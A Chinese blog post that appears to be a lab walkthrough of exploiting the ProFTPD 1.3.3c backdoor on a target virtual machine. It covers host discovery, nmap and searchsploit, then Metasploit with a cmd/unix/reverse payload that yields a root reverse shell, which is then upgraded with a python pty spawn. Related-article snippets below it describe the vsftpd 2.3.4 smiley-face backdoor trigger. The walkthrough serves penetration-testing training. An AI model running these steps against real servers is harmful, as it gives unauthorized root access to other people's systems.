渗透测试---FTP服务后门

最新推荐文章于 2024-05-18 00:37:32 发布
最新推荐文章于 2024-05-18 00:37:32 发布
阅读量708 收藏 1
点赞数 4
分类专栏: 渗透测试 服务漏洞利用 文章标签: 安全 web安全 网络安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39291229/article/details/127673032
版权

目录

主机发现

端口扫描

nmap

漏洞查找

searchsploit

漏洞利用

Metasploit

交互式shell

需要环境可私信

主机发现

arp-scan -l

 靶机IP地址为192.168.20.149

端口扫描

nmap

nmap -sV -p- 192.168.20.149

 发现21端口上开放了FTP服务 并且版本号为 ProFTPD 1.3.3c

漏洞查找

searchsploit

使用searchsploit查找对应的漏洞

searchsploit ProFTPD 1.3.3c

 可以看到有一条后门命令执行的漏洞(Bcakdoor Command Execution) 并且提示在Metasploit中使用

漏洞利用

Metasploit

打开Metasploit

msfconsole

 

查找对应漏洞 ProFTPD 1.3.3c

search ProFTPD 1.3.3c

 

描述信息也与searchsploit中的相匹配 选择其进行使用

use 0

 

查看payloads 并选择使用/cmd/unix/generic

show payloads

set payload cmd/unix/reverse

 

查看需要设置的参数

对RHOST LHOST进行参数设置 RHOST为靶机地址 LHOST为kali渗透机地址

输入run运行

 

交互式shell

可以看到 成功获取了靶机权限并且为root权限

 

但是此界面用着并不舒适 这里可以用交互式shell修改一下

python -c 'import pty;pty.spawn("/bin/bash")'

 拿到了root最高权限 渗透成功

tzyyyyyy
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
一起了解FTP渗透
课嗨教育的专栏
10-02 944
Ftp笑脸漏洞, 这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,即可运行 vsf_sysutil_extra() :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。首先是弱口令,弱口令作为渗透突破中的一大要点,在实战中常见的弱口令也是不少的,如企业开放与互联网边界的设备或系统,VPN设备,虚拟化桌面,邮件等系统,弱口令是一个必不可少的测试阶段。账户anonymous。
windows ftp命令_后渗透系列——下载(Windows篇)
weixin_39767121的博客
01-17 643
渗透系列——下载文件(Windows篇)后渗透是指已对目标服务器有shell交互后的操作,通常包含权限维持、提权、内网渗透、一键拿域控。本篇文章主要讲解后渗透准备工作——下载文件的方式,文件可以是木马、工具等等(任意文件皆可),为了方便演示,文件为test.txt。1.准备工作首先需要架设服务器,并把要下载的文件部署在服务器上,笔者用的服务器为Kali Linux架设,ip地址是192...
CTF夺旗-FTP服务后门利用-靶机渗透实战
居上
11-29 701
FTP服务后门利用信息收集检索漏洞漏洞利用 环境 IP: 攻击机:192.168.36.128 靶机:192.168.36.139 链接: https://pan.baidu.com/s/1wMKfK6eLXb_GbkGX2RwXNg 提取码:olrh 信息收集 nmap -sS {ip/netmask} #扫描某个网段下存活的主机 nmap -sV {ip} #扫描目标ip的开放服务以及版本信息 nmap -A -v T4 {ip} #扫描目标ip的全部信息 检索漏洞 searchsploit ProF
FTP-利用FTP后门漏洞
Myu_wzy的博客
09-24 817
一、实验原理 vsftpd手工触发漏洞: 当进行FTP认证时,如果用户名USER中包含" :) ",那么直接就触发监听6200端口的连接的shell 二、实验环境 目标主机:Metasploit2虚拟机 192.168.20.143 攻击主机: Kali2虚拟机 192.168.20.133 三、实验过程 先用nc连接靶机,并在进行FTP认证时,用户名包含" :) " 此时靶机的6200端口已经开启 由于nmap进行自动扫描时,默认不会扫描6200端口,所以需要我们手动扫描6.
Python 渗透测试FTP 文件传输 爆破.(21端口)
最新发布
网络安全领域___专研者.
05-18 508
文件传输是指在计算机网络中将数据从一个位置传输到另一个位置的过程。文件传输爆破是一种黑客攻击手段,主要针对文件传输系统的漏洞进行暴力破解.
渗透测试学习笔记二 FTP(HTB Fawn)
Rick66Ashley的博客
10-27 300
4.wiki的资料显示,只有经过加密的FTP才是标准的使用方法,同时,SFTP采用的是22号端口。未加密的FTP往往已收中间人攻击,而经过隧道加密的SFTP,即添加了只有源主机和目标主机才能解密的加密层则可以避免许多在进入攻击。3.确认和靶机联通后,nmap扫描开放端口,-sV可以查看开放端口,可以看端口服务版本,还可看到对面靶机的操作系统OS(Operating System);5.成功登入ftp后,可以使用ls列出当前列表的文件,可以用cd改变路径,用get下载文件到使用ftp的目录。
创建FTP站点 使用PE文件管理器共享文件
笑一个吧
07-04 1619
Ftp协议 FTP(File Transfer Protocol,文件传输协议) 是 TCP/IP 协议组中的协议之一。FTP协议包括两个组成部分,其一为FTP服务器,其二为FTP客户端。其中FTP服务器用来存储文件,用户可以使用FTP客户端通过FTP协议访问位于FTP服务器上的资源。在开发网站的时候,通常利用FTP协议把网页或程序传到Web服务器上。此外,由于FTP传输效率非常高,在网络上传输大的文件时,一般也采用该协议。 默认情况下FTP协议使用TCP端口中的 20和21这两个端口,其中20用于传输数
网络安全-渗透完整笔记
03-27
总的来说,网络安全渗透测试是一门综合性的技术,涵盖漏洞分析、代码审计、网络扫描、攻击执行、后门部署、免杀技术等多个方面。学习这些知识不仅能够帮助安全专家提高防御能力,也能使攻击者了解如何实施更有效的...
PCMan-FTP+溢出脚本
01-17
本文将深入探讨"PCMan-FTP+溢出脚本"这一主题,该主题与针对PCMan-FTP服务器的实战渗透测试密切相关。PCMan-FTP是一款流行的开源FTP(File Transfer Protocol)服务器软件,由于其在设计或实现上的某些缺陷,可能会...
webshell FTP快速提权服务器 教材
12-16
同时,对于渗透测试人员,也能提供实战技能的提升,确保他们在测试过程中能准确评估目标系统的安全性。 【标签】:“Webshell FTP快速提权服务器教程详细”这一标签突出了本教材的重点,即Webshell的使用和FTP提权...
Next Generation Banner Grabbing-开源
04-25
网络服务横幅抓取是一种常见的网络安全渗透测试技术,用于识别网络上运行的服务类型、版本信息及其他元数据。"Next Generation Banner Grabbing" 提供了一种更为先进和全面的方法来执行这项任务。这款名为 ...
FastSpy Port Scanner-开源
05-03
这款工具的特点在于其优化的扫描机制,能够最大限度地减少连接空闲时间,从而在短时间内对大量目标进行扫描,这对于网络安全分析、系统管理员进行网络审计以及渗透测试人员查找开放端口至关重要。 首先,让我们深入...
入门渗透FTP入侵——Fawn
栉风沐雪的博客
01-31 1780
入门渗透FTP入侵——Fawn,使用的是hackthebox靶机。小技巧:可以通过搜索引擎查找csftpd 3.0.3出现的CVE漏洞等,一般最新的服务漏洞不会曝光,但是如果不是最新版本,可以查找相关的漏洞,使用msf的模块进行渗透。遇到没有进行加密的ftp一般运行于21端口,此处靶机为简单的ftp服务。使用的是hackthebox的Fawn靶机。
FTP弱口令渗透测试
明裕学长的博客
05-24 2953
任务环境说明: 服务器场景:Windows 服务器场景操作系统:Windows(版本不详) 渗透机环境说明: BT5渗透机用户名:root密码:toor Kali渗透机用户名:root密码:toor Windows7渗透机用户名:administrator密码:123456 靶机场景Windows--1 172.16.105.249 1.在BT5中使用Zenmap工具扫描服务器场景Windows所在网段(例如:172.16.101.0/24)范围内存活的主机IP地址和指定开放的21、22、2
FTP(匿名登录)未授权访问VSFTPD2.3.4漏洞渗透
热门推荐
weixin_52347768的博客
05-05 1万+
漏洞扫描考察论文
MSF针对FTP后门攻击危害
永远是少年
06-07 808
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF针对FTP后门攻击危害。 一、模块使用 二、参数设定与执行 三、结果查看
6-1漏洞利用-FTP漏洞利用
山兔的博客
06-30 4001
文件传输协议(英文:File Transfer Protocol,缩写:FTP)是用于在网络上进行文件传输的一套标准协议,使用客户/服务器模式。它属于网络传输协议的应用层。FTP使用21号端口。FTP在传输时,需要对应的用户用户分类:1、Real用户管理者在管理FTP服务器,为每一个用户创建对应名称的real用户或者是它有自己名称的用户,我们用户登录FTP服务器时,使用的是real用户的账号密码,这个时候,我们登录只能查看自己所在文件夹的内容,不能查看其它文件夹2、Administrator管理员登录之后,
网站ftp服务器漏洞利用,网站入侵渗透综合分析和FTP提权得系统权限
weixin_32175667的博客
08-04 973
当我们想入侵检测一个网站拿后台/webshell后想进一步获得网站的服务器管理权限。小残在这里为大家介绍下一下思路第一个思路:啊D+GOOGLE找注入点PS:可以通过直接在网站查看动态界面 类似于:asp?id=的动态界面进行手工查找如果没找到动态页面可以通过百度或者谷歌进行搜索网站的动态页面通过谷歌语法: 假如要查看的网站是www.*****.net 那么就可以这样搜索 site:www.***...
Ftp笑脸漏洞复现(后门漏洞)
qq_55857040的博客
12-13 5338
目录 漏洞简介: 这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,即可运行 vsf_sysutil_extra() :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。因为输入用户名需要带有:),所以称笑脸漏洞 实验环境: 实验准备 实验过程 小总结 漏洞简介: 这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的...
OA_Automotive_Ethernet_ECU_TestSpecification_Layer_3-7_v3.0.pdf
12-24
"OA_Automotive_Ethernet_ECU_TestSpecification_Layer_3-7_v3.0.pdf 是一份由OPEN Alliance发布的车载以太网电子控制单元(ECU)测试规范,专注于Layer 3到Layer 7的测试。该文档由Thomas Kirchmeier(宝马公司)和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tzyyyyyy

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值